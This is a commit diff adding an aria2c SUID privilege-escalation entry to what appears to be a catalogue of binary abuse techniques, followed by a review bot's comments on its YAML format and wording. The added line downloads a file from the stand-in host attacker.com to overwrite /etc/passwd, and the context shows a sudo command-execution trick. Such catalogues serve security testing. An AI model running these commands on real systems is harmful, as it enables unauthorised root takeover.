Add SUID method to aria2c

Found this new method of abusing aria2c's suid for privilege escalation.
ohyicong 2023-01-02 16:36:59 +08:00
parent f4e71b63cb
commit 42cac0885e

@ -17,6 +17,10 @@ functions:
echo "$COMMAND" > $TF echo "$COMMAND" > $TF
chmod +x $TF chmod +x $TF
sudo aria2c --on-download-error=$TF http://x sudo aria2c --on-download-error=$TF http://x
suid:
- code: |
aria2c -d /etc/ -o passwd "http://attacker.com/passwd" --allow-overwrite=true
- description: Remote download and replace /etc/passwd with root privilege.
limited-suid: limited-suid:
- code: | - code: |
COMMAND='id' COMMAND='id'
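
Review bot: In the added `suid:` entry, `description` appears as its own list item (`- description: ...`) after `- code: |`, so as shown it parses as a second entry with no code instead of describing the aria2c command; make it a key of the same item as `code`. The command also hard-codes `attacker.com`, a registrable domain, while the neighbouring entries use shell variables (`$COMMAND`, `$TF`); a placeholder variable or a reserved name such as `example.com` would match the rest of the file. The description says the overwrite happens "with root privilege", which only holds when the SUID binary is owned by root, so the wording should state that condition.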